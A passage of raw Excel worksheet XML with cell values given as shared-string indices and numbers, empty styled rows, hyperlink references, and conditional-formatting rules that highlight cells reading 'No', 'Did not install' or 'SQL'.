      </c>
      <c r="F71" s="59">
        <v>2</v>
      </c>
      <c r="G71" s="59">
        <v>21</v>
      </c>
    </row>
    <row r="72" spans="2:7">
      <c r="B72" t="s">
        <v>117</v>
      </c>
      <c r="D72" s="59">
        <v>38</v>
      </c>
      <c r="E72" s="59">
        <v>7</v>
      </c>
      <c r="F72" s="59">
        <v>5</v>
      </c>
      <c r="G72" s="59">
        <v>50</v>
      </c>
    </row>
    <row r="90" spans="2:2">
      <c r="B90" s="15"/>
    </row>
    <row r="91" spans="2:2">
      <c r="B91" s="15"/>
    </row>
    <row r="92" spans="2:2">
      <c r="B92" s="15"/>
    </row>
    <row r="93" spans="2:2">
      <c r="B93" s="15"/>
    </row>
    <row r="94" spans="2:2">
      <c r="B94" s="15"/>
    </row>
    <row r="95" spans="2:2">
      <c r="B95" s="15"/>
    </row>
    <row r="96" spans="2:2">
      <c r="B96" s="15"/>
    </row>
    <row r="97" spans="2:2">
      <c r="B97" s="15"/>
    </row>
    <row r="98" spans="2:2">
      <c r="B98" s="15"/>
    </row>
    <row r="99" spans="2:2">
      <c r="B99" s="15"/>
    </row>
    <row r="100" spans="2:2">
      <c r="B100" s="15"/>
    </row>
    <row r="101" spans="2:2">
      <c r="B101" s="15"/>
    </row>
    <row r="102" spans="2:2">
      <c r="B102" s="15"/>
    </row>
    <row r="103" spans="2:2">
      <c r="B103" s="15"/>
    </row>
    <row r="104" spans="2:2">
      <c r="B104" s="15"/>
    </row>
    <row r="105" spans="2:2">
      <c r="B105" s="15"/>
    </row>
    <row r="106" spans="2:2">
      <c r="B106" s="15"/>
    </row>
    <row r="107" spans="2:2">
      <c r="B107" s="15"/>
    </row>
    <row r="108" spans="2:2">
      <c r="B108" s="15"/>
    </row>
    <row r="109" spans="2:2">
      <c r="B109" s="15"/>
    </row>
    <row r="110" spans="2:2">
      <c r="B110" s="15"/>
    </row>
    <row r="111" spans="2:2">
      <c r="B111" s="15"/>
    </row>
    <row r="112" spans="2:2">
      <c r="B112" s="15"/>
    </row>
    <row r="113" spans="2:2">
      <c r="B113" s="15"/>
    </row>
    <row r="114" spans="2:2">
      <c r="B114" s="15"/>
    </row>
    <row r="115" spans="2:2">
      <c r="B115" s="15"/>
    </row>
    <row r="116" spans="2:2">
      <c r="B116" s="15"/>
    </row>
    <row r="117" spans="2:2">
      <c r="B117" s="15"/>
    </row>
    <row r="118" spans="2:2">
      <c r="B118" s="15"/>
    </row>
    <row r="119" spans="2:2">
      <c r="B119" s="15"/>
    </row>
    <row r="120" spans="2:2">
      <c r="B120" s="15"/>
    </row>
    <row r="121" spans="2:2">
      <c r="B121" s="15"/>
    </row>
    <row r="122" spans="2:2">
      <c r="B122" s="15"/>
    </row>
    <row r="123" spans="2:2">
      <c r="B123" s="15"/>
    </row>
    <row r="124" spans="2:2">
      <c r="B124" s="15"/>
    </row>
    <row r="125" spans="2:2">
      <c r="B125" s="15"/>
    </row>
    <row r="126" spans="2:2">
      <c r="B126" s="15"/>
    </row>
    <row r="127" spans="2:2">
      <c r="B127" s="15"/>
    </row>
    <row r="128" spans="2:2">
      <c r="B128" s="15"/>
    </row>
    <row r="129" spans="2:2">
      <c r="B129" s="15"/>
    </row>
    <row r="130" spans="2:2">
      <c r="B130" s="15"/>
    </row>
    <row r="131" spans="2:2">
      <c r="B131" s="15"/>
    </row>
    <row r="132" spans="2:2">
      <c r="B132" s="15"/>
    </row>
    <row r="395" spans="6:6">
      <c r="F395" t="s">
        <v>123</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="H45:H68">
    <cfRule type="beginsWith" dxfId="8" priority="3" operator="beginsWith" text="No">
      <formula>LEFT(H45,LEN("No"))="No"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H45:H68">
    <cfRule type="containsText" dxfId="7" priority="2" operator="containsText" text="Did not install">
      <formula>NOT(ISERROR(SEARCH("Did not install",H45)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H45:H68">
    <cfRule type="containsText" dxfId="6" priority="1" operator="containsText" text="SQL">
      <formula>NOT(ISERROR(SEARCH("SQL",H45)))</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="B3" r:id="rId2" xr:uid="{BFD10E7D-E354-4A38-A8DD-493D8C95D530}"/>
    <hyperlink ref="B4" r:id="rId3" xr:uid="{BDAA67A1-76CA-4A0F-8287-D7242B4EB099}"/>
    <hyperlink ref="B7" r:id="rId4" xr:uid="{F4763EB4-D498-454D-AACD-8FD0A3F29CD8}"/>
    <hyperlink ref="B20" r:id="rId5" xr:uid="{4D28A6CF-7A33-4DF5-87F5-CB9F297CD6ED}"/>
    <hyperlink ref="B21" r:id="rId6" xr:uid="{BA7B890F-CC1A-4611-9E79-AD6A04CF53D8}"/>
    <hyperlink ref="B22" r:id="rId7" xr:uid="{29EC5B18-268C-4098-AC63-4D6607A0832C}"/>
    <hyperlink ref="B23" r:id="rId8" xr:uid="{35046599-1B1D-401C-9FA1-85D6E6C8A351}"/>
    <hyperlink ref="B24" r:id="rId9" xr:uid="{CC0459A9-CDA9-4833-9751-06CF7F434EFC}"/>
    <hyperlink ref="B25" r:id="rId10" xr:uid="{D84DDE3D-D360-4B77-856B-FA14E9EE45E2}"/>
    <hyperlink ref="B26" r:id="rId11" xr:uid="{BB2A5066-CDA2-4542-81A9-24BC1A6D11DD}"/>
    <hyperlink ref="B27" r:id="rId12" xr:uid="{3D14BB9A-6816-4F05-A91C-AFCD3AE46C1C}"/>
    <hyperlink ref="B28" r:id="rId13" xr:uid="{95102F95-E30D-4AFA-B3FC-53206CCAD0A9}"/>
    <hyperlink ref="B29" r:id="rId14" xr:uid="{516995FF-FBA2-4A0C-9665-1C5A01B30A1B}"/>
    <hyperlink ref="B30" r:id="rId15" xr:uid="{130955E6-F26B-4363-BBFA-0D1F9EA6589C}"/>
    <hyperlink ref="H31" r:id="rId16" xr:uid="{7622A2C4-4F27-476C-8B74-16249E981663}"/>
    <hyperlink ref="B31" r:id="rId17" xr:uid="{45489740-2606-49D9-BB3F-B7EC281131F0}"/>
    <hyperlink ref="B32" r:id="rId18" xr:uid="{0E5EF655-E0C2-4BA4-8EE0-17778249EC59}"/>
    <hyperlink ref="B33" r:id="rId19" xr:uid="{60CC37F6-7447-4385-8EB1-C44E9E8845C8}"/>
    <hyperlink ref="B34" r:id="rId20" xr:uid="{6DE06AEB-E5C5-46B4-81A9-571F52D36788}"/>
    <hyperlink ref="B35" r:id="rId21" xr:uid="{BD51480B-E87E-43B0-BEA0-50DD2A74AA7D}"/>
    <hyperlink ref="B36" r:id="rId22" xr:uid="{CA27EE92-BD92-4828-9489-430F3A1899A3}"/>
    <hyperlink ref="B37" r:id="rId23" xr:uid="{C1101730-8C7B-4F4E-ABAF-97DDB2D68847}"/>
    <hyperlink ref="H38" r:id="rId24" xr:uid="{6B7DD659-DAAD-4D35-AE4C-942151A73923}"/>
    <hyperlink ref="B38" r:id="rId25" xr:uid="{C3C12D32-56C7-4ED4-9C4F-A519EBF69A2A}"/>
    <hyperlink ref="B39" r:id="rId26" xr:uid="{5B84DC4B-D9B1-42B1-8052-A16B21226FA5}"/>
    <hyperlink ref="B40" r:id="rId27" xr:uid="{B584BD3D-6B8E-4EAE-BC34-AE5A543548B5}"/>
    <hyperlink ref="B41" r:id="rId28" xr:uid="{E21C72A7-8965-4E76-8B0D-9125A3909F8D}"/>
    <hyperlink ref="B42" r:id="rId29" xr:uid="{48C03B9B-D2A9-467B-9EE4-2B5106CC81A5}"/>
    <hyperlink ref="B43" r:id="rId30" xr:uid="{885CDDD1-CE02-43F9-AD4E-B231616D9F45}"/>
    <hyperlink ref="B44" r:id="rId31" xr:uid="{630C8A50-E23D-4C7A-AF79-54B2A87292CE}"/>
    <hyperlink ref="B45" r:id="rId32" xr:uid="{25DF58EB-C240-4D22-8B2F-D3518FB0085D}"/>
    <hyperlink ref="H21" r:id="rId33" xr:uid="{9D1CB1C6-B04B-449C-953B-59CFBC1CCD96}"/>
    <hyperlink ref="H46" r:id="rId34" xr:uid="{E6CF27B1-C51A-4FCA-BA6B-7D72E08009BC}"/>
    <hyperlink ref="B46" r:id="rId35" xr:uid="{2677878C-314A-4F7B-BD24-F4E132FF1953}"/>
    <hyperlink ref="B47" r:id="rId36" xr:uid="{15824F17-FCCC-4132-89DA-A3831BFC8AB7}"/>
    <hyperlink ref="B48" r:id="rId37" xr:uid="{16C95E45-37A4-4F61-A1F6-34FD6734DFBE}"/>
    <hyperlink ref="B49" r:id="rId38" xr:uid="{2F9BFA9B-ECD3-4AAB-8169-2C86D84229E3}"/>
    <hyperlink ref="B50" r:id="rId39" xr:uid="{D9B56377-F702-44E8-8AAF-77F227A2472D}"/>
    <hyperlink ref="B51" r:id="rId40" xr:uid="{930CAE8C-EA6A-4670-931E-B4BFDA57735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BBAE9-FD36-4B79-93BB-656D5967E934}">
  <dimension ref="A1:J52"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F22" sqref="F22"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="6.5703125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="34.42578125" customWidth="1"/>
    <col min="3" max="3" width="5.28515625" customWidth="1"/>
    <col min="4" max="4" width="15.28515625" customWidth="1"/>
    <col min="5" max="5" width="12.42578125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="23.85546875" customWidth="1"/>
    <col min="7" max="7" width="18.7109375" customWidth="1"/>
    <col min="8" max="8" width="46.42578125" customWidth="1"/>
    <col min="9" max="9" width="11" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="50.5703125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="5" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>124</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:10" ht="16.5" customHeight="1">
      <c r="A2" s="1"/>
      <c r="B2" s="25" t="s">
        <v>125</v>
      </c>
      <c r="C2" t="s">
        <v>11</v>
      </c>
      <c r="D2" t="s">
        <v>19</v>
      </c>
      <c r="E2" s="1">
        <v>10</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>126</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H2" s="3" t="s">
        <v>127</v>
      </c>
      <c r="I2" s="1">
        <v>60</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="3" spans="1:10">
      <c r="A3" s="1"/>
      <c r="B3" s="25" t="s">
        <v>129</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
      <c r="D3" t="s">
        <v>19</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>130</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>75</v>
      </c>
      <c r="G3" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H3" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I3" s="1">
        <v>10</v>
      </c>
      <c r="J3" s="1"/>
    </row>
    <row r="4" spans="1:10">
      <c r="A4" s="1"/>
      <c r="B4" s="25" t="s">
        <v>131</v>
      </c>
      <c r="C4" t="s">
        <v>11</v>
      </c>
      <c r="D4" t="s">
        <v>19</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>130</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>132</v>
      </c>
      <c r="G4" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I4" s="1">
        <v>10</v>
      </c>
      <c r="J4" s="1"/>
    </row>
    <row r="5" spans="1:10">
      <c r="A5" s="1"/>
      <c r="B5" s="25" t="s">
        <v>133</v>
      </c>
      <c r="C5" t="s">
        <v>11</v>
      </c>
      <c r="D5" t="s">
        <v>19</v>
      </c>
      <c r="E5" s="1">
        <v>10</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>134</v>
      </c>
      <c r="G5" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H5" s="24" t="s">
        <v>135</v>
      </c>
      <c r="I5" s="1">
        <v>40</v>
      </c>
      <c r="J5" s="1"/>
    </row>
    <row r="6" spans="1:10">
      <c r="A6" s="1"/>
      <c r="B6" s="1" t="s">
        <v>136</v>
      </c>
      <c r="C6" t="s">
        <v>11</v>
      </c>
      <c r="D6" t="s">
        <v>19</v>
      </c>
      <c r="E6" s="1">
        <v>138</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>137</v>
      </c>
      <c r="G6" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H6" s="24" t="s">
        <v>135</v>
      </c>
      <c r="I6" s="1">
        <v>40</v>
      </c>
      <c r="J6" s="1"/>
    </row>
    <row r="7" spans="1:10">
      <c r="A7" s="1"/>
      <c r="B7" s="25" t="s">
        <v>138</v>
      </c>
      <c r="C7" t="s">
        <v>11</v>
      </c>
      <c r="D7" t="s">
        <v>19</v>
      </c>
      <c r="E7" s="1">
        <v>806</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>137</v>
      </c>
      <c r="G7" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H7" s="1"/>
      <c r="I7" s="1">
        <v>10</v>
      </c>
      <c r="J7" s="1"/>
    </row>
    <row r="8" spans="1:10">
      <c r="A8" s="1"/>
      <c r="B8" s="1" t="s">
        <v>139</v>
      </c>
      <c r="C8" t="s">
        <v>11</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E8" s="24"/>
      <c r="F8" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G8" s="1" t="s">
        <v>141</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>142</v>
      </c>
      <c r="I8" s="1">
        <v>15</v>
      </c>
      <c r="J8" s="1"/>
    </row>
    <row r="9" spans="1:10">
      <c r="A9" s="1"/>
      <c r="B9" s="25" t="s">
        <v>143</v>
      </c>
      <c r="C9" t="s">
        <v>11</v>
      </c>
      <c r="D9" t="s">
        <v>19</v>
      </c>
      <c r="E9" s="1">
        <v>69</v>
      </c>
      <c r="F9" s="1" t="s">
        <v>37</v>
      </c>
      <c r="G9" s="1" t="s">
        <v>144</v>
      </c>
      <c r="H9" s="24"/>
      <c r="I9" s="1">
        <v>120</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="10" spans="1:10">
      <c r="A10" s="1"/>
      <c r="B10" s="25" t="s">
        <v>146</v>
      </c>
      <c r="C10" t="s">
        <v>11</v>
      </c>
      <c r="D10" t="s">
        <v>19</v>
      </c>
      <c r="E10" s="1" t="s">
        <v>147</v>
      </c>
      <c r="F10" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G10" s="1" t="s">
        <v>148</v>
      </c>
      <c r="H10" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I10" s="1">
        <v>20</v>
      </c>
      <c r="J10" s="1"/>
    </row>
    <row r="11" spans="1:10">
      <c r="A11" s="1"/>
      <c r="B11" s="25" t="s">
        <v>149</v>
      </c>
      <c r="C11" t="s">
        <v>11</v>
      </c>
      <c r="D11" t="s">
        <v>19</v>
      </c>
      <c r="E11" s="1">
        <v>154</v>
      </c>
      <c r="F11" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G11" s="1" t="s">
        <v>150</v>
      </c>
      <c r="H11" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I11" s="1">
        <v>10</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="12" spans="1:10">
      <c r="A12" s="1"/>
      <c r="B12" s="1" t="s">
        <v>152</v>
      </c>
      <c r="C12" t="s">
        <v>11</v>
      </c>
      <c r="D12" t="s">
        <v>30</v>
      </c>
      <c r="E12" s="1" t="s">
        <v>153</v>
      </c>
      <c r="F12" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G12" s="1" t="s">
        <v>150</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I12" s="1">
        <v>15</v>
      </c>
      <c r="J12" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="13" spans="1:10">
      <c r="A13" s="1"/>
      <c r="B13" s="25" t="s">
        <v>154</v>
      </c>
      <c r="C13" t="s">
        <v>11</v>
      </c>
      <c r="D13" t="s">
        <v>19</v>
      </c>
      <c r="E13" s="1">
        <v>158</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>155</v>
      </c>
      <c r="G13" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H13" s="1" t="s">
        <v>156</v>
      </c>
      <c r="I13" s="1">
        <v>60</v>
      </c>
      <c r="J13" s="1"/>
    </row>
    <row r="14" spans="1:10">
      <c r="A14" s="1"/>
      <c r="B14" s="1" t="s">
        <v>157</v>
      </c>
      <c r="C14" t="s">
        <v>11</v>
      </c>
      <c r="D14" t="s">
        <v>19</v>
      </c>
      <c r="E14" s="1">
        <v>33</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>132</v>
      </c>
      <c r="G14" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I14" s="1">
        <v>20</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="15" spans="1:10">
      <c r="A15" s="1"/>
      <c r="B15" s="25" t="s">
        <v>158</v>
      </c>
      <c r="C15" t="s">
        <v>11</v>
      </c>
      <c r="D15" t="s">
        <v>19</v>
      </c>
      <c r="E15" s="1">
        <v>117</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G15" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>160</v>
      </c>
      <c r="I15" s="1">
        <v>120</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="16" spans="1:10">
      <c r="A16" s="1"/>
      <c r="B16" s="25" t="s">
        <v>162</v>
      </c>
      <c r="C16" t="s">
        <v>11</v>
      </c>
      <c r="D16" t="s">
        <v>30</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G16" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H16" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I16" s="1"/>
      <c r="J16" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="17" spans="1:10">
      <c r="A17" s="1"/>
      <c r="B17" s="1" t="s">
        <v>163</v>
      </c>
      <c r="C17" t="s">
        <v>11</v>
      </c>
      <c r="D17" t="s">
        <v>19</v>
      </c>
      <c r="E17" s="24"/>
      <c r="F17" s="1" t="s">
        <v>132</v>
      </c>
      <c r="G17" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H17" s="1"/>
      <c r="I17" s="1">
        <v>120</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="18" spans="1:10">
      <c r="A18" s="1"/>
      <c r="B18" s="25" t="s">
        <v>165</v>
      </c>
      <c r="C18" t="s">
        <v>11</v>
      </c>
      <c r="D18" t="s">
        <v>19</v>
      </c>
      <c r="E18" s="1">
        <v>30</v>
      </c>
      <c r="F18" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G18" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H18" s="1" t="s">
        <v>166</v>
      </c>
      <c r="I18" s="1">
        <v>60</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="19" spans="1:10">
      <c r="A19" s="1"/>
      <c r="B19" s="25" t="s">
        <v>168</v>
      </c>
      <c r="C19" t="s">
        <v>11</v>
      </c>
      <c r="D19" t="s">
        <v>19</v>
      </c>
      <c r="E19" s="1">
        <v>14</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G19" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I19" s="1">
        <v>15</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="20" spans="1:10">
      <c r="A20" s="1"/>
      <c r="B20" s="25" t="s">
        <v>169</v>
      </c>
      <c r="C20" t="s">
        <v>11</v>
      </c>
      <c r="D20" t="s">
        <v>19</v>
      </c>
      <c r="E20" s="1">
        <v>18</v>
      </c>
      <c r="F20" s="1" t="s">
        <v>170</v>
      </c>
      <c r="G20" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H20" s="1" t="s">
        <v>171</v>
      </c>
      <c r="I20" s="1">
        <v>60</v>
      </c>
      <c r="J20" s="1"/>
    </row>
    <row r="21" spans="1:10">
      <c r="A21" s="1"/>
      <c r="B21" s="25" t="s">
        <v>172</v>
      </c>
      <c r="C21" t="s">
        <v>11</v>
      </c>
      <c r="D21" t="s">
        <v>30</v>
      </c>
      <c r="E21" s="1">
        <v>31</v>
      </c>
      <c r="F21" s="1" t="s">
        <v>173</v>
      </c>
      <c r="G21" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H21" s="1" t="s">
        <v>174</v>
      </c>
      <c r="I21" s="1">
        <v>60</v>
      </c>
      <c r="J21" s="1" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="22" spans="1:10">
      <c r="A22" s="1"/>
      <c r="B22" s="25" t="s">
        <v>176</v>
      </c>
      <c r="C22" t="s">
        <v>11</v>
      </c>
      <c r="D22" t="s">
        <v>19</v>
      </c>
      <c r="E22" s="1">
        <v>987</v>
      </c>
      <c r="F22" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G22" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H22" s="1" t="s">
        <v>177</v>
      </c>
      <c r="I22" s="1">
        <v>180</v>
      </c>
      <c r="J22" s="1"/>
    </row>
    <row r="23" spans="1:10">
      <c r="A23" s="1"/>
      <c r="B23" s="25" t="s">
        <v>178</v>
      </c>
      <c r="C23" t="s">
        <v>11</v>
      </c>
      <c r="D23" t="s">
        <v>19</v>
      </c>
      <c r="E23" s="1">
        <v>151</v>
      </c>
      <c r="F23" s="1" t="s">
        <v>26</v>
      </c>
      <c r="G23" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H23" s="1" t="s">
        <v>179</v>
      </c>
      <c r="I23" s="1">
        <v>90</v>
      </c>
      <c r="J23" s="1"/>
    </row>
    <row r="24" spans="1:10">
      <c r="A24" s="1"/>
      <c r="B24" s="1" t="s">
        <v>180</v>
      </c>
      <c r="C24" t="s">
        <v>11</v>
      </c>
      <c r="D24" t="s">
        <v>19</v>
      </c>
      <c r="E24" s="24"/>
      <c r="F24" s="1" t="s">
        <v>26</v>
      </c>
      <c r="G24" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H24" s="1" t="s">
        <v>181</v>
      </c>
      <c r="I24" s="24"/>
      <c r="J24" s="1" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="25" spans="1:10">
      <c r="A25" s="1"/>
      <c r="B25" s="25" t="s">
        <v>183</v>
      </c>
      <c r="C25" t="s">
        <v>11</v>
      </c>
      <c r="D25" t="s">
        <v>30</v>
      </c>
      <c r="E25" s="1">
        <v>122</v>
      </c>
      <c r="F25" s="1" t="s">
        <v>26</v>
      </c>
      <c r="G25" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H25" s="1" t="s">
        <v>142</v>
      </c>
      <c r="I25" s="1">
        <v>30</v>
      </c>
      <c r="J25" s="1"/>
    </row>
    <row r="26" spans="1:10">
      <c r="A26" s="1"/>
      <c r="B26" s="1" t="s">
        <v>184</v>
      </c>
      <c r="C26" t="s">
        <v>11</v>
      </c>
      <c r="D26" t="s">
        <v>19</v>
      </c>
      <c r="E26" s="1">
        <v>50</v>
      </c>
      <c r="F26" s="1" t="s">
        <v>185</v>
      </c>
      <c r="G26" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H26" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I26" s="1">
        <v>15</v>
      </c>
      <c r="J26" s="1" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="27" spans="1:10">
      <c r="A27" s="1"/>
      <c r="B27" s="25" t="s">
        <v>186</v>
      </c>
      <c r="C27" t="s">
        <v>11</v>
      </c>
      <c r="D27" t="s">
        <v>12</v>
      </c>
      <c r="E27" s="1">
        <v>8</v>
      </c>
      <c r="F27" s="1" t="s">
        <v>187</v>
      </c>
      <c r="G27" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H27" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I27" s="1">
        <v>10</v>
      </c>
      <c r="J27" s="1" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="28" spans="1:10">
      <c r="A28" s="1"/>
      <c r="B28" s="25" t="s">
        <v>189</v>
      </c>
      <c r="C28" t="s">
        <v>11</v>
      </c>
      <c r="D28" t="s">
        <v>19</v>
      </c>
      <c r="E28" s="1">
        <v>151</v>
      </c>
      <c r="F28" s="1" t="s">
        <v>190</v>
      </c>
      <c r="G28" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H28" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I28" s="1">
        <v>45</v>
      </c>
      <c r="J28" s="1"/>
    </row>
    <row r="29" spans="1:10">
      <c r="A29" s="1"/>
      <c r="B29" s="1" t="s">
        <v>191</v>
      </c>
      <c r="C29" t="s">
        <v>11</v>
      </c>
      <c r="D29" t="s">
        <v>19</v>
      </c>
      <c r="E29" s="1">
        <v>79</v>
      </c>
      <c r="F29" s="1" t="s">
        <v>192</v>
      </c>
      <c r="G29" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H29" s="1" t="s">
        <v>193</v>
      </c>
      <c r="I29" s="1">
        <v>60</v>
      </c>
      <c r="J29" s="1" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="30" spans="1:10">
      <c r="A30" s="1"/>
      <c r="B30" s="25" t="s">
        <v>195</v>
      </c>
      <c r="C30" t="s">
        <v>11</v>
      </c>
      <c r="D30" t="s">
        <v>19</v>
      </c>
      <c r="E30" s="1" t="s">
        <v>196</v>
      </c>
      <c r="F30" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G30" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H30" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I30" s="1">
        <v>10</v>
      </c>
      <c r="J30" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="31" spans="1:10">
      <c r="A31" s="1"/>
      <c r="B31" s="25" t="s">
        <v>197</v>
      </c>
      <c r="C31" t="s">
        <v>11</v>
      </c>
      <c r="D31" t="s">
        <v>19</v>
      </c>
      <c r="E31" s="1">
        <v>117</v>
      </c>
      <c r="F31" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G31" s="1" t="s">
        <v>198</v>
      </c>
      <c r="H31" s="1" t="s">
        <v>199</v>
      </c>
      <c r="I31" s="1">
        <v>60</v>
      </c>
      <c r="J31" s="1" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="32" spans="1:10">
      <c r="A32" s="1"/>
      <c r="B32" s="1" t="s">
        <v>201</v>
      </c>
      <c r="C32" t="s">
        <v>11</v>
      </c>
      <c r="D32" t="s">
        <v>19</v>
      </c>
      <c r="E32" s="1">
        <v>88</v>
      </c>
      <c r="F32" s="1" t="s">
        <v>37</v>
      </c>
      <c r="G32" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H32" s="1" t="s">
        <v>202</v>
      </c>
      <c r="I32" s="1">
        <v>30</v>
      </c>
      <c r="J32" s="1" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="33" spans="1:10">
      <c r="A33" s="1"/>
      <c r="B33" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C33" t="s">
        <v>11</v>
      </c>
      <c r="D33" t="s">
        <v>19</v>
      </c>
      <c r="E33" s="1">
        <v>54</v>
      </c>
      <c r="F33" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G33" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H33" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I33" s="1">
        <v>20</v>
      </c>
      <c r="J33" s="1"/>
    </row>
    <row r="34" spans="1:10">
      <c r="A34" s="1"/>
      <c r="B34" s="25" t="s">
        <v>205</v>
      </c>
      <c r="C34" t="s">
        <v>11</v>
      </c>
      <c r="D34" t="s">
        <v>19</v>
      </c>
      <c r="E34" s="1">
        <v>279</v>
      </c>
      <c r="F34" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G34" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H34" s="1" t="s">
        <v>206</v>
      </c>
      <c r="I34" s="1">
        <v>240</v>
      </c>
      <c r="J34" s="1"/>
    </row>
    <row r="35" spans="1:10" ht="16.5" customHeight="1">
      <c r="A35" s="1"/>
      <c r="B35" s="1" t="s">
        <v>207</v>
      </c>
      <c r="C35" t="s">
        <v>11</v>
      </c>
      <c r="D35" t="s">
        <v>19</v>
      </c>
      <c r="E35" s="1">
        <v>32</v>
      </c>
      <c r="F35" s="1" t="s">
        <v>208</v>
      </c>
      <c r="G35" s="1" t="s">
        <v>58</v>
      </c>
